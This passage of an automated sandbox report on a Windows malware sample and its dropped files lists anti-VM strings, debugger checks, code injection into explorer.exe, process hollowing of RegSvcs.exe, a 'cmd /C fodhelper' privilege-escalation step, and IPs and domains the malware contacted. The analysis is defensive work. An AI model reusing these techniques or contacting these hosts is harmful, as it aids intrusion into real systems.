Source: explorer.exe, 00000001.00000000.1683495531.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: CA65.exe, 00000007.00000003.2923351971.0000000003476000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBAMZvmci/v9lu2mS+O/M3cUaAMvMrIOsTCKVWdgTHvKYn6UHCdNCgnztj
Source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: 11VBoxSFWINDIRWD
Source: CA65.exe, 00000007.00000003.2909503805.000000000346E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: csrss.exe, 0000001C.00000002.4254132084.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\HGFS`
Source: CA65.exe, 00000007.00000003.2909503805.000000000346E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBALTKLm+Dn2//Wdsm4wVkqC6KdyxM64ihWRVmcinNdv7gngpzrQ45dqJm
Source: explorer.exe, 00000001.00000000.1682291427.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1682291427.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1683495531.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: vmhgfsP
Source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: aryvmcixn-SR-%W
Source: CA65.exe, 00000007.00000003.3050255291.0000000003471000.00000004.00000020.00020000.00000000.sdmp, CA65.exe, 00000007.00000003.3066762044.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBANR5BdXVbpdMX3Ob1V3BfuQemU8uU69NjLB2JC4zlLSJaVSbQRjWJMEV
Source: csrss.exe, 0000001C.00000002.4254384912.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1683495531.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1680983414.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1682291427.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1685712273.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\;
Source: explorer.exe, 00000001.00000000.1680983414.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: tVMSrvcs\|!
Source: explorer.exe, 00000001.00000000.1682291427.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1679822993.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1679822993.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	API call chain: ExitProcess graph end node			graph_13-68354
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node			graph_16-11582

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

Process information queried: ProcessInformation

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Anti Debugging

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

Code function: 0_2_004029BA LdrLoadDll,

0_2_004029BA

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe

Code function: 13_2_6CA1948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_6CA1948B

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe

Code function: 13_2_6C9CB6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

13_2_6C9CB6C0

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_006E092B mov eax, dword ptr fs:[00000030h]	0_2_006E092B
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_006E0D90 mov eax, dword ptr fs:[00000030h]	0_2_006E0D90
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0071DB13 push dword ptr fs:[00000030h]	0_2_0071DB13
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005A092B mov eax, dword ptr fs:[00000030h]	3_2_005A092B
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005A0D90 mov eax, dword ptr fs:[00000030h]	3_2_005A0D90
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_005CCB33 push dword ptr fs:[00000030h]	3_2_005CCB33
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_052610A3 push dword ptr fs:[00000030h]	6_2_052610A3
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Code function: 6_2_05420042 push dword ptr fs:[00000030h]	6_2_05420042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044A216 mov eax, dword ptr fs:[00000030h]	16_2_0044A216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044A216 mov eax, dword ptr fs:[00000030h]	16_2_0044A216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044B0C2 mov eax, dword ptr fs:[00000030h]	16_2_0044B0C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443340 mov eax, dword ptr fs:[00000030h]	16_2_00443340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443340 mov eax, dword ptr fs:[00000030h]	16_2_00443340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443300 mov eax, dword ptr fs:[00000030h]	16_2_00443300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00443320 mov ecx, dword ptr fs:[00000030h]	16_2_00443320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444380 mov ecx, dword ptr fs:[00000030h]	16_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444380 mov eax, dword ptr fs:[00000030h]	16_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444380 mov ecx, dword ptr fs:[00000030h]	16_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044B43D mov eax, dword ptr fs:[00000030h]	16_2_0044B43D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044AA56 mov eax, dword ptr fs:[00000030h]	16_2_0044AA56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444A70 mov ecx, dword ptr fs:[00000030h]	16_2_00444A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444A70 mov eax, dword ptr fs:[00000030h]	16_2_00444A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044AD86 mov eax, dword ptr fs:[00000030h]	16_2_0044AD86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044AD86 mov eax, dword ptr fs:[00000030h]	16_2_0044AD86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044ADB0 mov ecx, dword ptr fs:[00000030h]	16_2_0044ADB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044AE62 mov eax, dword ptr fs:[00000030h]	16_2_0044AE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044AE00 mov eax, dword ptr fs:[00000030h]	16_2_0044AE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044AE00 mov eax, dword ptr fs:[00000030h]	16_2_0044AE00

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

Code function: 0_2_0041B998 GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,

0_2_0041B998

Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0040B29D SetUnhandledExceptionFilter,	0_2_0040B29D
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00413F0E SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00413F0E
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0040B29D SetUnhandledExceptionFilter,	3_2_0040B29D
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00413F0E SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00413F0E
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA1948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_6CA1948B
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA1B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_6CA1B144

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 2E76.exe.1.dr

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.215.49 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.46.59 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: ssh.studnets.ocps.net
Source: C:\Windows\explorer.exe	Network Connect: 34.94.245.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.180.10.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: pop3.saskgmail.com
Source: C:\Windows\explorer.exe	Network Connect: 172.67.185.93 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 196.188.169.138 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.17 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: imap.9a07f8a339ec2a3e.com

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\CA65.exe

Code function: 6_2_05420110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

6_2_05420110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Thread created: C:\Windows\explorer.exe EIP: 1371AD0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Thread created: unknown EIP: 3301AD0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Thread created: unknown EIP: 33C1A40

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Memory written: C:\Users\user\AppData\Local\Temp\CA65.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 3716 base: 5979C0 value: 90			Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 5268 base: 7FF72B812D10 value: 90			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibjhisi	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\F6A9.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
Source: C:\ProgramData\Drivers\csrss.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 5979C0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44E000
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 452000
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 469000
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C87008
Source: C:\Windows\System32\consent.exe	Memory written: C:\Windows\System32\svchost.exe base: 6F350FE8F8

Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process created: C:\Users\user\AppData\Local\Temp\CA65.exe C:\Users\user\AppData\Local\Temp\CA65.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6844 -ip 6844
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 788
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7044 -ip 7044
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6844 -ip 6844
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7044 -ip 7044
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2232 -ip 2232
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2232 -ip 2232
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 848
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 828
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\consent.exe consent.exe 5704 448 0000021C6C8372A0
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\1DCB.exe "C:\Users\user\AppData\Local\Temp\1DCB.exe" /SPAWNWND=$A031E /NOTIFYWND=$E0426
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Users\user\AppData\Local\Temp\4E3.exe "C:\Users\user\AppData\Local\Temp\4E3.exe"
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\ProgramData\Drivers\csrss.exe	Process created: unknown unknown

Source: explorer.exe, 00000001.00000000.1680027410.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1682291427.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1680837509.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1680027410.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1679822993.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1680027410.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1680027410.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe

Code function: 13_2_6CA184B0 cpuid

13_2_6CA184B0

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: GetLocaleInfoW,	0_2_00414046
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: GetLocaleInfoW,	0_2_0041405F
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW,	0_2_0040B005
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	0_2_004140C9
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	0_2_004171EE
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: __crtGetLocaleInfoA_stat,	0_2_00414208
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	0_2_00417305
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	0_2_0041739D
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_004175E3
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_004176D0
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: GetLocaleInfoA,	0_2_0041C687
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: _strlen,EnumSystemLocalesA,	0_2_004176A7
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__itoa_s,	0_2_00417773
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00417737
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: GetLocaleInfoW,	3_2_00414046
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: GetLocaleInfoW,	3_2_0041405F
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoW,	3_2_0040B005
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	3_2_004140C9
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	3_2_004171EE
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: __crtGetLocaleInfoA_stat,	3_2_00414208
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: _LcidFromHexString,GetLocaleInfoA,	3_2_00417305
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	3_2_0041739D
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_004175E3
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_004176D0
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: GetLocaleInfoA,	3_2_0041C687
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: _strlen,EnumSystemLocalesA,	3_2_004176A7
